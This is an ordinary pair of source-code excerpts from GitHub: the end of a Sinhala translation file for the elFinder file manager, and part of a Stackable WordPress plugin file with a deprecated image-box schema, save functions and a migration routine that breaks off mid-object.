'ntfreload' : 'ෆෝල්ඩර් අන්තර්ගතය නැවත අළුත් කරමින්(Reloading)',
'ntfmkdir' : 'ෆෝල්ඩරයක් නිර්මාණය කරමින්',
'ntfmkfile' : 'ගොනුව නිර්මාණය කරමින්',
'ntfrm' : 'අයිතමයන් මකමින්',
'ntfcopy' : 'අයිතමයන් පිටපත් කරමින්',
'ntfmove' : 'අයිතමයන් සම්පූර්ණයෙන් විස්ථාපනය කරමින්',
'ntfprepare' : 'පවතින අයිතම පිරික්සමින්',
'ntfrename' : 'ගොනු නැවත නම් කරමින්',
'ntfupload' : 'ගොනු උඩුගත(uploading) කරමින්',
'ntfdownload' : 'ගොනු බාගත(downloading) කරමින්',
'ntfsave' : 'ගොනු සුරකිමින්',
'ntfarchive' : 'සංරක්ෂණය(archive) සාදමින්',
'ntfextract' : 'සංරක්ෂණයෙන්(archive) ගොනු දිගහරිමින්(Extracting)',
'ntfsearch' : 'ගොනු සොයමින්',
'ntfresize' : 'රූප ප්රමාණය වෙනස් කරමින්',
'ntfsmth' : 'දෙයක් කරමින්',
'ntfloadimg' : 'පින්තූරය පූරණය කරමින්(Loading)',
'ntfnetmount' : 'ජාල එ්කකයක් සවිකරමින්(Mounting network volume)', // added 18.04.2012
'ntfnetunmount': 'ජාල එ්කකයක් ගලවමින්(Unmounting network volume)', // from v2.1 added 30.04.2012
'ntfdim' : 'පිංතූරයේ මානය(dimension) ලබාගනිමින්', // added 20.05.2013
'ntfreaddir' : 'ෆෝල්ඩරයේ තොරතුරු කියවමින්', // from v2.1 added 01.07.2013
'ntfurl' : 'Getting URL of link', // from v2.1 added 11.03.2014
'ntfchmod' : 'ගොනු ආකරය වෙනස් කරමින්', // from v2.1 added 20.6.2015
'ntfpreupload': 'උඩුගත(upload) කරන ලද ගොනු නාමය සත්යාපනය කරමින්(Verifying)', // from v2.1 added 31.11.2015
'ntfzipdl' : 'බාගත කරගැනීම(download) සඳහා ගොනුවක් නිර්මාණය කරමින්', // from v2.1.7 added 23.1.2016
'ntfparents' : 'මාර්ග(path) තොරතුරු ලබා ගනිමින්', // from v2.1.17 added 2.11.2016
'ntfchunkmerge': 'උඩුගත කරන ලද(uploaded) ගොනුව සකසමින්', // from v2.1.17 added 2.11.2016
'ntftrash' : 'කුණු කූඩයට දමමින්', // from v2.1.24 added 2.5.2017
'ntfrestore' : 'කුණු කූඩයට දැමීම යළි පිහිටුවමින්(Doing restore)', // from v2.1.24 added 3.5.2017
'ntfchkdir' : 'ගමනාන්ත(destination) ෆෝල්ඩරය පරීක්ෂා කරමින්', // from v2.1.24 added 3.5.2017
'ntfundo' : 'පෙර මෙහෙයුම(operation) ඉවත් කරමින්', // from v2.1.27 added 31.07.2017
'ntfredo' : 'පෙර ආපසු හැරවීම යළි සැකසමින්', // from v2.1.27 added 31.07.2017
/*********************************** volumes *********************************/
'volume_Trash' : 'කුණු කූඩය', //from v2.1.24 added 29.4.2017
/************************************ dates **********************************/
'dateUnknown' : 'නොදනී',
'Today' : 'අද',
'Yesterday' : 'ඊයේ',
'msJan' : 'ජනවා.',
'msFeb' : 'පෙබ.',
'msMar' : 'මාර්.',
'msApr' : 'අප්රේ.',
'msMay' : 'මැයි',
'msJun' : 'ජූනි',
'msJul' : 'ජුලි',
'msAug' : 'අගෝ.',
'msSep' : 'සැප්.',
'msOct' : 'ඔක්තෝ.',
'msNov' : 'නොවැ.',
'msDec' : 'දෙසැ.',
'January' : 'ජනවාරි',
'February' : 'පෙබරවාරි',
'March' : 'මාර්තු',
'April' : 'අප්රේල්',
'May' : 'මැයි',
'June' : 'ජූනි',
'July' : 'ජුලි',
'August' : 'අගෝස්තු',
'September' : 'සැප්තැම්බර්',
'October' : 'ඔක්තෝම්බර්',
'November' : 'නොවැම්බර්',
'December' : 'දෙසැම්බර්',
'Sunday' : 'ඉරිදා',
'Monday' : 'සඳුදා',
'Tuesday' : 'අඟහරුවාදා',
'Wednesday' : 'බදාදා',
'Thursday' : 'බ්රහස්පතින්දා',
'Friday' : 'සිකුරාදා',
'Saturday' : 'සෙනසුරාදා',
'Sun' : 'ඉරිදා',
'Mon' : 'සඳු.',
'Tue' : 'අඟහ.',
'Wed' : 'බදාදා',
'Thu' : 'බ්රහස්.',
'Fri' : 'සිකු.',
'Sat' : 'සෙන.',
/******************************** sort variants ********************************/
'sortname' : 'නම අනුව',
'sortkind' : 'වර්ගය අනුව',
'sortsize' : 'ප්රමාණය අනුව',
'sortdate' : 'දිනය අනුව',
'sortFoldersFirst' : 'ෆෝල්ඩර වලට පළමු තැන',
'sortperm' : 'අවසරය අනුව', // from v2.1.13 added 13.06.2016
'sortmode' : 'අාකාරය අනුව', // from v2.1.13 added 13.06.2016
'sortowner' : 'හිමිකරු අනුව', // from v2.1.13 added 13.06.2016
'sortgroup' : 'කණ්ඩායම අනුව', // from v2.1.13 added 13.06.2016
'sortAlsoTreeview' : 'එලෙසටම රුක්සටහනත්(Treeview)', // from v2.1.15 added 01.08.2016
/********************************** new items **********************************/
'untitled file.txt' : 'NewFile.txt', // added 10.11.2015
'untitled folder' : 'නව ෆෝල්ඩරයක්', // added 10.11.2015
'Archive' : 'NewArchive', // from v2.1 added 10.11.2015
/********************************** messages **********************************/
'confirmReq' : 'තහවුරු කිරීම අවශ්යයි',
'confirmRm' : 'අයිතමයන් සදහටම ඉවත් කිරීමට අවශ්ය බව ඔබට විශ්වාසද?<br/>මෙය අාපසු හැරවිය නොහැකිය!',
'confirmRepl' : 'පැරණි අයිතමය නව එකක මගින් ප්රතිස්ථාපනය කරන්නද?',
'confirmRest' : 'දැනට පවතින අයිතමය කුණු කූඩය තුළ පවතින අයිතමය මගින් ප්රතිස්ථාපනය කරන්නද?', // fromv2.1.24 added 5.5.2017
'confirmConvUTF8' : 'UTF-8 හි නොවේ<br/> UTF-8 වෙත පරිවර්තනය කරන්න ද?<br/>සුරැකීමෙන් පසු අන්තර්ගතය UTF-8 බවට පරිවර්තනය වේ.', // from v2.1 added 08.04.2014
'confirmNonUTF8' : 'මෙම ගොනුවෙහි කේතන කේත(Character encoding) හඳුනාගත නොහැකි විය. සංස්කරණ කිරීමට එය තාවකාලිකව UTF-8 වෙත පරිවර්තනය කිරීම අවශ්ය වේ.<br/>කරුණාකර මෙම ගොනුවෙහි අක්ෂර කේතන කේත(character encoding) තෝරන්න.', // from v2.1.19 added 28.11.2016
'confirmNotSave' : 'මෙය වෙනස් කර ඇත.<br/>ඔබට වෙනස්කම් සුරැකීමට නොහැකි නම් සිදු කරනු ලැබූ වෙනස්කම් අහිමි වේ.', // from v2.1 added 15.7.2015
'confirmTrash' : 'කුණු කූඩය තුලට අයිතමය යැවීමට ඔබට අවශ්ය ද?', //from v2.1.24 added 29.4.2017
'apllyAll' : 'සියල්ලටම යොදන්න',
'name' : 'නම',
'size' : 'ප්රමාණය',
'perms' : 'අවසරය',
'modify' : 'නවීකරණය කෙරුණ ලද්දේ',
'kind' : 'ජාතිය',
'read' : 'කියවන්න',
'write' : 'ලියන්න',
'noaccess' : 'ප්රවේශයක් නොමැත',
'and' : 'සහ',
'unknown' : 'නොහඳුනයි',
'selectall' : 'සියලු ගොනු තෝරන්න',
'selectfiles' : 'ගොනු(ව) තෝරන්න',
'selectffile' : 'පළමු ගොනුව තෝරන්න',
'selectlfile' : 'අවසාන ගොනුව තෝරන්න',
'viewlist' : 'ලැයිස්තු අාකාරය',
'viewicons' : 'අයිකන අාකාරය',
'places' : 'Places',
'calc' : 'ගණනය කරන්න',
'path' : 'මාර්ගය',
'aliasfor' : 'Alias for',
'locked' : 'අගුළු දමා ඇත',
'dim' : 'මාන(Dimensions)',
'files' : 'ගොනු',
'folders' : 'ෆෝල්ඩර',
'items' : 'අයිතම(Items)',
'yes' : 'ඔව්',
'no' : 'නැත',
'link' : 'සබැඳිය(Link)',
'searcresult' : 'සෙවුම් ප්රතිඵල',
'selected' : 'තෝරාගත් අයිතම',
'about' : 'මේ ගැන',
'shortcuts' : 'කෙටිමං',
'help' : 'උදව්',
'webfm' : 'වෙබ් ගොනු කළමනාකරු',
'ver' : 'අනුවාදය(version)',
'protocolver' : 'ප්රොටොකෝලය අනුවාදය(protocol version)',
'homepage' : 'ව්යාපෘතිය නිවහන',
'docs' : 'ලේඛනගත කිරීම',
'github' : 'Github හරහා සංවාදයේ යෙදෙන්න',
'twitter' : 'Twitter හරහා අපව සම්බන්ධ වන්න',
'facebook' : 'Facebook හරහා අප සමඟ එකතු වන්න',
'team' : 'කණ්ඩායම',
'chiefdev' : 'ප්රධාන සංස්කරු(chief developer)',
'developer' : 'සංස්කරු(developer)',
'contributor' : 'දායකයා(contributor)',
'maintainer' : 'නඩත්තු කරන්නා(maintainer)',
'translator' : 'පරිවර්තකයා',
'icons' : 'අයිකන',
'dontforget' : 'and don\'t forget to take your towel',
'shortcutsof' : 'කෙටිමං අක්රීය කර ඇත',
'dropFiles' : 'ගොනු මෙතැනට ඇද දමන්න',
'or' : 'හෝ',
'selectForUpload' : 'ගොනු තෝරන්න',
'moveFiles' : 'අායිත්තම සම්පූර්ණයෙන් විස්ථාපනය',
'copyFiles' : 'අයිතමයන් පිටපත් කරන්න',
'restoreFiles' : 'Restore items', // from v2.1.24 added 5.5.2017
'rmFromPlaces' : 'Remove from places',
'aspectRatio' : 'දර්ශන අනුපාතය(Aspect ratio)',
'scale' : 'පරිමාණය',
'width' : 'පළල',
'height' : 'උස',
'resize' : 'ප්රතිප්රමානණය',
'crop' : 'Crop',
'rotate' : 'කැරකැවීම',
'rotate-cw' : 'අංශක 90කින් කරකවන්න CW',
'rotate-ccw' : 'අංශක 90කින් කරකවන්න CCW',
'degree' : '°',
'netMountDialogTitle' : 'Mount network volume', // added 18.04.2012
'protocol' : 'Protocol', // added 18.04.2012
'host' : 'Host', // added 18.04.2012
'port' : 'Port', // added 18.04.2012
'user' : 'පරිශීලක', // added 18.04.2012
'pass' : 'මුරපදය', // added 18.04.2012
'confirmUnmount' : 'Are you unmount $1?', // from v2.1 added 30.04.2012
'dropFilesBrowser': 'Drop or Paste files from browser', // from v2.1 added 30.05.2012
'dropPasteFiles' : 'Drop files, Paste URLs or images(clipboard) here', // from v2.1 added 07.04.2014
'encoding' : 'කේතීකරණය(Encoding)', // from v2.1 added 19.12.2014
'locale' : 'Locale', // from v2.1 added 19.12.2014
'searchTarget' : 'ඉලක්කය: $1', // from v2.1 added 22.5.2015
'searchMime' : 'Search by input MIME Type', // from v2.1 added 22.5.2015
'owner' : 'හිමිකරු', // from v2.1 added 20.6.2015
'group' : 'සමූහය', // from v2.1 added 20.6.2015
'other' : 'වෙනත්', // from v2.1 added 20.6.2015
'execute' : 'ක්රයාත්මක කරන්න', // from v2.1 added 20.6.2015
'perm' : 'අවසරය', // from v2.1 added 20.6.2015
'mode' : 'Mode', // from v2.1 added 20.6.2015
'emptyFolder' : 'ෆෝල්ඩරය හිස්', // from v2.1.6 added 30.12.2015
'emptyFolderDrop' : 'ෆාේල්ඩරය හිස්\\A අායිත්තම අතහැරීමෙන් අැතුලු කරන්න', // from v2.1.6 added 30.12.2015
'emptyFolderLTap' : 'ෆාේල්ඩරය හිස්\\A දිර්ඝ එබීමෙන් අායිත්තම අැතුලු කරන්න', // from v2.1.6 added 30.12.2015
'quality' : 'ගුණාත්මකභාවය', // from v2.1.6 added 5.1.2016
'autoSync' : 'Auto sync', // from v2.1.6 added 10.1.2016
'moveUp' : 'Move up', // from v2.1.6 added 18.1.2016
'getLink' : 'Get URL link', // from v2.1.7 added 9.2.2016
'selectedItems' : 'තෝරාගත් අයිතම ($1)', // from v2.1.7 added 2.19.2016
'folderId' : 'Folder ID', // from v2.1.10 added 3.25.2016
'offlineAccess' : 'Allow offline access', // from v2.1.10 added 3.25.2016
'reAuth' : 'To re-authenticate', // from v2.1.10 added 3.25.2016
'nowLoading' : 'Now loading...', // from v2.1.12 added 4.26.2016
'openMulti' : 'බහු ගොනු විවෘත කරන්න', // from v2.1.12 added 5.14.2016
'openMultiConfirm': 'ඔබ $1 ගොනු විවෘත කිරීමට උත්සාහ කරයි. බ්රව්සරයෙන් ඔබට විවෘත කිරීමට අවශ්ය බව ඔබට විශ්වාසද?', // from v2.1.12 added 5.14.2016
'emptySearch' : 'සෙවුම් ඉලක්කයේ ගවේෂණ ප්රතිඵල නොමැත.', // from v2.1.12 added 5.16.2016
'editingFile' : 'එය ගොනුව සංස්කරණය කිරීමකි.', // from v2.1.13 added 6.3.2016
'hasSelected' : 'ඔබ අයිතම $1 ප්රමාණයක් තෝරාගෙන ඇත.', // from v2.1.13 added 6.3.2016
'hasClipboard' : 'You have $1 items in the clipboard.', // from v2.1.13 added 6.3.2016
'incSearchOnly' : 'Incremental search is only from the current view.', // from v2.1.13 added 6.30.2016
'reinstate' : 'යථා තත්ත්වයට පත් කරන්න', // from v2.1.15 added 3.8.2016
'complete' : '$1 සම්පූර්ණයි', // from v2.1.15 added 21.8.2016
'contextmenu' : 'Context menu', // from v2.1.15 added 9.9.2016
'pageTurning' : 'Page turning', // from v2.1.15 added 10.9.2016
'volumeRoots' : 'Volume roots', // from v2.1.16 added 16.9.2016
'reset' : 'යළි පිහිටුවන්න(Reset)', // from v2.1.16 added 1.10.2016
'bgcolor' : 'පසුබිම් වර්ණය', // from v2.1.16 added 1.10.2016
'colorPicker' : 'Color picker', // from v2.1.16 added 1.10.2016
'8pxgrid' : 'පික්සල් 8ක දැල', // from v2.1.16 added 4.10.2016
'enabled' : 'සක්රීයයි', // from v2.1.16 added 4.10.2016
'disabled' : 'අක්රීයයි', // from v2.1.16 added 4.10.2016
'emptyIncSearch' : 'වර්තමාන දර්ශනය තුළ සෙවුම් ප්රතිපල හිස්ව ඇත. \\A සෙවුම් ඉලක්කය පුළුල් කිරීම සඳහා [Enter] යතුර ඔබන්න.', // from v2.1.16 added 5.10.2016
'emptyLetSearch' : 'වර්තමාන දර්ශනයේ පළමු අකුර සෙවුම් ප්රතිපල හිස්ව පවතී.', // from v2.1.23 added 24.3.2017
'textLabel' : 'ලේබල්වල නම්', // from v2.1.17 added 13.10.2016
'minsLeft' : 'විනාඩි $1 ක් ගතවේ', // from v2.1.17 added 13.11.2016
'openAsEncoding' : 'Reopen with selected encoding', // from v2.1.19 added 2.12.2016
'saveAsEncoding' : 'Save with the selected encoding', // from v2.1.19 added 2.12.2016
'selectFolder' : 'ෆෝල්ඩරය තෝරන්න', // from v2.1.20 added 13.12.2016
'firstLetterSearch': 'පළමු අකුරෙන් සෙවීම', // from v2.1.23 added 24.3.2017
'presets' : 'Presets', // from v2.1.25 added 26.5.2017
'tooManyToTrash' : 'It\'s too many items so it can\'t into trash.', // from v2.1.25 added 9.6.2017
'TextArea' : 'TextArea', // from v2.1.25 added 14.6.2017
'folderToEmpty' : 'Empty the folder "$1".', // from v2.1.25 added 22.6.2017
'filderIsEmpty' : 'There are no items in a folder "$1".', // from v2.1.25 added 22.6.2017
'preference' : 'Preference', // from v2.1.26 added 28.6.2017
'language' : 'Language setting', // from v2.1.26 added 28.6.2017
'clearBrowserData': 'Initialize the settings saved in this browser', // from v2.1.26 added 28.6.2017
'toolbarPref' : 'Toolbar setting', // from v2.1.27 added 2.8.2017
'charsLeft' : '... $1 ක් අකුරු ඉතිරිව පවතී', // from v2.1.29 added 30.8.2017
'sum' : 'එකතුව', // from v2.1.29 added 28.9.2017
'roughFileSize' : 'Rough file size', // from v2.1.30 added 2.11.2017
'autoFocusDialog' : 'Focus on the element of dialog with mouseover', // from v2.1.30 added 2.11.2017
'select' : 'තෝරන්න', // from v2.1.30 added 23.11.2017
'selectAction' : 'ගොනුවක් තේරූ විට සිදුකල යුතු දේ', // from v2.1.30 added 23.11.2017
'useStoredEditor' : 'Open with the editor used last time', // from v2.1.30 added 23.11.2017
'selectinvert' : 'ප්රතිවිරුද්ධ අාකාරයට තෝරන්න', // from v2.1.30 added 25.11.2017
'renameMultiple' : 'Are you sure you want to rename $1 selected items like $2?<br/>This cannot be undone!', // from v2.1.31 added 4.12.2017
'batchRename' : 'Batch rename', // from v2.1.31 added 8.12.2017
'plusNumber' : '+ Number', // from v2.1.31 added 8.12.2017
'asPrefix' : 'Add prefix', // from v2.1.31 added 8.12.2017
'asSuffix' : 'Add suffix', // from v2.1.31 added 8.12.2017
'changeExtention' : 'Change extention', // from v2.1.31 added 8.12.2017
'columnPref' : 'Columns settings (List view)', // from v2.1.32 added 6.2.2018
'reflectOnImmediate' : 'All changes will reflect immediately to the archive.', // from v2.1.33 added 2.3.2018
'reflectOnUnmount' : 'Any changes will not reflect until un-mount this volume.', // from v2.1.33 added 2.3.2018
'unmountChildren' : 'The following volume(s) mounted on this volume also unmounted. Are you sure to unmount it?', // from v2.1.33 added 5.3.2018
'selectionInfo' : 'තෝරාගැනීම්වල තොරතුරු', // from v2.1.33 added 7.3.2018
'hashChecker' : 'Algorithms to show the file hash', // from v2.1.33 added 10.3.2018
/********************************** mimetypes **********************************/
'kindUnknown' : 'නොදන්නා',
'kindRoot' : 'Volume Root', // from v2.1.16 added 16.10.2016
'kindFolder' : 'ෆෝල්ඩරය',
'kindSelects' : 'තේරීම්', // from v2.1.29 added 29.8.2017
'kindAlias' : 'Alias',
'kindAliasBroken' : 'Broken alias',
// applications
'kindApp' : 'Application',
'kindPostscript' : 'Postscript ලේඛනය',
'kindMsOffice' : 'Microsoft Office ලේඛනය',
'kindMsWord' : 'Microsoft Word ලේඛනය',
'kindMsExcel' : 'Microsoft Excel ලේඛනය',
'kindMsPP' : 'Microsoft Powerpoint presentation',
'kindOO' : 'Open Office ලේඛනය',
'kindAppFlash' : 'Flash application',
'kindPDF' : 'Portable Document Format (PDF)',
'kindTorrent' : 'Bittorrent file',
'kind7z' : '7z archive',
'kindTAR' : 'TAR archive',
'kindGZIP' : 'GZIP archive',
'kindBZIP' : 'BZIP archive',
'kindXZ' : 'XZ archive',
'kindZIP' : 'ZIP archive',
'kindRAR' : 'RAR archive',
'kindJAR' : 'Java JAR file',
'kindTTF' : 'True Type font',
'kindOTF' : 'Open Type font',
'kindRPM' : 'RPM package',
// texts
'kindText' : 'Text ලේඛනය',
'kindTextPlain' : 'Plain text',
'kindPHP' : 'PHP මූලාශ්රය',
'kindCSS' : 'Cascading style sheet',
'kindHTML' : 'HTML ලේඛනය',
'kindJS' : 'Javascript මූලාශ්රය',
'kindRTF' : 'Rich Text Format',
'kindC' : 'C මූලාශ්රය',
'kindCHeader' : 'C header මූලාශ්රය',
'kindCPP' : 'C++ මූලාශ්රය',
'kindCPPHeader' : 'C++ header මූලාශ්රය',
'kindShell' : 'Unix shell රචනයකි',
'kindPython' : 'Python මූලාශ්රය',
'kindJava' : 'Java මූලාශ්රය',
'kindRuby' : 'Ruby මූලාශ්රය',
'kindPerl' : 'Perl රචනයකි',
'kindSQL' : 'SQL මූලාශ්රය',
'kindXML' : 'XML ලේඛනය',
'kindAWK' : 'AWK මූලාශ්රය',
'kindCSV' : 'කොමාවන් වෙන් කළ අගයන්',
'kindDOCBOOK' : 'Docbook XML ලේඛනය',
'kindMarkdown' : 'Markdown text', // added 20.7.2015
// images
'kindImage' : 'පින්තූරය',
'kindBMP' : 'BMP පින්තූරය',
'kindJPEG' : 'JPEG පින්තූරය',
'kindGIF' : 'GIF පින්තූරය',
'kindPNG' : 'PNG පින්තූරය',
'kindTIFF' : 'TIFF පින්තූරය',
'kindTGA' : 'TGA පින්තූරය',
'kindPSD' : 'Adobe Photoshop පින්තූරය',
'kindXBITMAP' : 'X bitmap පින්තූරය',
'kindPXM' : 'Pixelmator පින්තූරය',
// media
'kindAudio' : 'ශබ්ධ මාධ්ය',
'kindAudioMPEG' : 'MPEG ශබ්ධපටය',
'kindAudioMPEG4' : 'MPEG-4 ශබ්ධපටය',
'kindAudioMIDI' : 'MIDI ශබ්ධපටය',
'kindAudioOGG' : 'Ogg Vorbis ශබ්ධපටය',
'kindAudioWAV' : 'WAV ශබ්ධපටය',
'AudioPlaylist' : 'MP3 playlist',
'kindVideo' : 'Video මාධ්ය',
'kindVideoDV' : 'DV චිත්රපටය',
'kindVideoMPEG' : 'MPEG චිත්රපටය',
'kindVideoMPEG4' : 'MPEG-4 චිත්රපටය',
'kindVideoAVI' : 'AVI චිත්රපටය',
'kindVideoMOV' : 'Quick Time චිත්රපටය',
'kindVideoWM' : 'Windows Media චිත්රපටය',
'kindVideoFlash' : 'Flash චිත්රපටය',
'kindVideoMKV' : 'Matroska චිත්රපටය',
'kindVideoOGG' : 'Ogg චිත්රපටය'
}
};
}));
| {
"pile_set_name": "Github"
} |
/**
* Internal dependencies
*/
import SVGArrow from './images/arrow.svg'
/**
* External dependencies
*/
import { range } from '~stackable/util'
import classnames from 'classnames'
import { i18n } from 'stackable'
/**
* WordPress dependencies
*/
import { __ } from '@wordpress/i18n'
import { applyFilters } from '@wordpress/hooks'
import { RichText } from '@wordpress/block-editor'
const deprecatedSchema_1_17_3 = {
align: {
type: 'string',
},
columns: {
type: 'number',
default: 3,
},
titleColor: {
type: 'string',
default: '#ffffff',
},
subtitleColor: {
type: 'string',
default: '#ffffff',
},
overlayColor: {
type: 'string',
},
width: {
type: 'number',
default: 400,
},
height: {
type: 'number',
default: 400,
},
verticalAlign: {
type: 'string',
default: 'center',
},
horizontalAlign: {
type: 'string',
default: 'center',
},
design: {
type: 'string',
default: 'basic',
},
borderRadius: {
type: 'number',
default: 12,
},
shadow: {
type: 'number',
default: 3,
},
overlayOpacity: {
type: 'number',
default: 7,
},
imageHoverEffect: {
type: 'string',
default: '',
},
arrow: {
type: 'string',
default: '',
},
hoverEffect: {
type: 'string',
default: '',
},
// Keep the old attributes. Gutenberg issue https://github.com/WordPress/gutenberg/issues/10406
full: {
type: 'boolean',
},
title: {
type: 'string',
},
subtitle: {
type: 'string',
},
id: {
type: 'number',
},
url: {
type: 'string',
},
href: {
type: 'string',
},
// Custom CSS attributes.
customCSSUniqueID: {
type: 'string',
default: '',
},
customCSS: {
type: 'string',
default: '',
},
customCSSCompiled: {
type: 'string',
default: '',
},
}
// Wrap in curly or else statement will merge with the previous one and will error out.
{ [ 1, 2, 3, 4 ].forEach( i => {
deprecatedSchema_1_17_3[ `title${ i }` ] = {
source: 'html',
selector: `.ugb-image-box__item:nth-of-type(${ i }) .ugb-image-box__title`,
default: __( 'Title', i18n ),
}
deprecatedSchema_1_17_3[ `description${ i }` ] = {
source: 'html',
selector: `.ugb-image-box__item:nth-of-type(${ i }) .ugb-image-box__description`,
default: __( 'Description', i18n ),
}
deprecatedSchema_1_17_3[ `imageURL${ i }` ] = {
type: 'string',
}
deprecatedSchema_1_17_3[ `imageID${ i }` ] = {
type: 'number',
}
deprecatedSchema_1_17_3[ `link${ i }` ] = {
type: 'string',
source: 'attribute',
selector: `.ugb-image-box__item:nth-of-type(${ i }) .ugb-image-box__overlay`,
attribute: 'href',
default: '',
}
deprecatedSchema_1_17_3[ `newTab${ i }` ] = {
type: 'boolean',
source: 'attribute',
selector: `.ugb-image-box__item:nth-of-type(${ i }) .ugb-image-box__overlay`,
attribute: 'target',
default: false,
}
} ) }
const deprecatedSave_1_17_3 = props => {
const { className, attributes } = props
const {
titleColor,
subtitleColor,
overlayColor,
height,
width,
verticalAlign,
horizontalAlign,
align,
columns,
design = 'basic',
borderRadius = 12,
shadow = 3,
imageHoverEffect = '',
overlayOpacity = 7,
arrow = '',
} = props.attributes
const mainClasses = classnames( [
className,
'ugb-image-box',
'ugb-image-box--v3',
`ugb-image-box--columns-${ columns }`,
], applyFilters( 'stackable.image-box.mainclasses_1_17_3', {
[ `ugb-image-box--design-${ design }` ]: design !== 'basic',
[ `ugb-image-box--effect-${ imageHoverEffect }` ]: imageHoverEffect,
[ `ugb-image-box--overlay-${ overlayOpacity }` ]: overlayOpacity !== 7,
'ugb-image-box--arrow': arrow,
}, design, props ) )
const mainStyles = {
textAlign: horizontalAlign ? horizontalAlign : undefined,
'--overlay-color': overlayColor,
}
return (
<div className={ mainClasses } style={ mainStyles }>
{ applyFilters( 'stackable.image-box.save.output.before_1_17_3', null, design, props ) }
{ range( 1, columns + 1 ).map( i => {
const imageURL = attributes[ `imageURL${ i }` ]
const title = attributes[ `title${ i }` ]
const description = attributes[ `description${ i }` ]
const link = attributes[ `link${ i }` ]
const newTab = attributes[ `newTab${ i }` ]
const boxStyles = {
backgroundImage: imageURL ? `url(${ imageURL })` : undefined,
maxWidth: align !== 'wide' && align !== 'full' && columns === 1 ? width : undefined,
height,
textAlign: horizontalAlign,
justifyContent: verticalAlign,
borderRadius,
}
const boxClasses = classnames( [
'ugb-image-box__item',
], applyFilters( 'stackable.image-box.itemclasses_1_17_3', {
[ `ugb--shadow-${ shadow }` ]: shadow !== 3,
}, design, i, props ) )
const arrowClasses = classnames( [
'ugb-image-box__arrow',
`ugb-image-box__arrow--align-${ arrow }`,
] )
return (
<div className={ boxClasses } style={ boxStyles } key={ i }>
{ imageHoverEffect && <div
className="ugb-image-box__image-effect"
style={ {
backgroundImage: imageURL ? `url(${ imageURL })` : undefined,
} } />
}
{ /* eslint-disable-next-line */ }
<a
className="ugb-image-box__overlay"
href={ link }
target={ newTab ? '_blank' : undefined }
/>
<div className="ugb-image-box__content">
{ ! RichText.isEmpty( title ) && (
<RichText.Content
tagName="h4"
className="ugb-image-box__title"
style={ { color: titleColor } }
value={ title }
/>
) }
{ ! RichText.isEmpty( description ) && (
<RichText.Content
tagName="p"
className="ugb-image-box__description"
style={ { color: subtitleColor } }
value={ description }
/>
) }
</div>
{ arrow && link && (
<div className={ arrowClasses }>
<SVGArrow style={ { fill: titleColor ? titleColor : undefined } } />
</div>
) }
</div>
)
} ) }
{ applyFilters( 'stackable.image-box.save.output.after_1_17_3', null, design, props ) }
</div>
)
}
const deprecatedSave_1_17_3_ = ( hasTitleStyle = true, hasDescriptionStyle = true ) => props => {
const { className, attributes } = props
const {
titleColor,
subtitleColor,
overlayColor,
height,
width,
verticalAlign,
horizontalAlign,
align,
columns,
design = 'basic',
borderRadius = 12,
shadow = 3,
imageHoverEffect = '',
overlayOpacity = 7,
arrow = '',
} = props.attributes
const mainClasses = classnames( [
className,
'ugb-image-box',
'ugb-image-box--v3',
`ugb-image-box--columns-${ columns }`,
], applyFilters( 'stackable.image-box.mainclasses_1_17_3', {
[ `ugb-image-box--design-${ design }` ]: design !== 'basic',
[ `ugb-image-box--effect-${ imageHoverEffect }` ]: imageHoverEffect,
[ `ugb-image-box--overlay-${ overlayOpacity }` ]: overlayOpacity !== 7,
'ugb-image-box--arrow': arrow,
}, design, props ) )
const mainStyles = {
textAlign: horizontalAlign ? horizontalAlign : undefined,
'--overlay-color': overlayColor,
}
return (
<div className={ mainClasses } style={ mainStyles }>
{ applyFilters( 'stackable.image-box.save.output.before_1_17_3', null, design, props ) }
{ range( 1, columns + 1 ).map( i => {
const imageURL = attributes[ `imageURL${ i }` ]
const title = attributes[ `title${ i }` ]
const description = attributes[ `description${ i }` ]
const link = attributes[ `link${ i }` ]
const newTab = attributes[ `newTab${ i }` ]
const boxStyles = {
backgroundImage: imageURL ? `url(${ imageURL })` : undefined,
maxWidth: align !== 'wide' && align !== 'full' && columns === 1 ? width : undefined,
height,
textAlign: horizontalAlign,
justifyContent: verticalAlign,
borderRadius,
}
const boxClasses = classnames( [
'ugb-image-box__item',
], applyFilters( 'stackable.image-box.itemclasses_1_17_3', {
[ `ugb--shadow-${ shadow }` ]: shadow !== 3,
}, design, i, props ) )
const arrowClasses = classnames( [
'ugb-image-box__arrow',
`ugb-image-box__arrow--align-${ arrow }`,
] )
return (
<div className={ boxClasses } style={ boxStyles } key={ i }>
{ imageHoverEffect && <div
className="ugb-image-box__image-effect"
style={ {
backgroundImage: imageURL ? `url(${ imageURL })` : undefined,
} } />
}
{ /* eslint-disable-next-line */ }
<a
className="ugb-image-box__overlay"
href={ link }
target={ newTab ? '_blank' : undefined }
/>
<div className="ugb-image-box__content">
{ ! RichText.isEmpty( title ) && (
<RichText.Content
tagName="h4"
className="ugb-image-box__title"
style={ hasTitleStyle ? { color: titleColor } : undefined }
value={ title }
/>
) }
{ ! RichText.isEmpty( description ) && (
<RichText.Content
tagName="p"
className="ugb-image-box__description"
style={ hasDescriptionStyle ? { color: subtitleColor } : undefined }
value={ description }
/>
) }
</div>
{ arrow && link && (
<div className={ arrowClasses }>
<SVGArrow style={ { fill: titleColor ? titleColor : undefined } } />
</div>
) }
</div>
)
} ) }
{ applyFilters( 'stackable.image-box.save.output.after_1_17_3', null, design, props ) }
</div>
)
}
const migrate_1_17_3 = attributes => {
// Update the custom CSS since the structure has changed.
const updateCSS = css => ( css || '' )
.replace( /\.ugb-image-box__overlay(\s*{)/g, '.ugb-image-box__overlay-hover$1' )
// try and get full image url & dimensions.
return {
...attributes,
// Custom CSS.
customCSS: updateCSS( attributes.customCSS ),
customCSSCompiled: updateCSS( attributes.customCSSCompiled ),
// width option when there's only 1 column.
blockWidth: attributes.columns === 1 && attributes.align !== 'full' ? attributes.width : undefined, // Old width is the same as the block width option.
columnHeight: attributes.height,
columnContentVerticalAlign: attributes.verticalAlign,
contentAlign: attributes.horizontalAlign,
// Link.
link1Url: attributes.link1,
link2Url: attributes.link2,
link3Url: attributes.link3,
link4Url: attributes.link4,
link1NewTab: attributes.newTab1,
link2NewTab: attributes.newTab2,
link3NewTab: attributes.newTab3,
link4NewTab: attributes.newTab4,
// Image.
image1Id: attributes.imageID1,
image2Id: attributes.imageID2,
image3Id: attributes.imageID3,
image4Id: attributes.imageID4,
image1Url: attributes.imageURL1,
image2Url: attributes.imageURL2,
image3Url: attributes.imageURL3,
image4Url: attributes.imageURL4,
image1FullUrl: attributes.imageURL1,
image2FullUrl: attributes.imageURL2,
image3FullUrl: attributes.imageURL3,
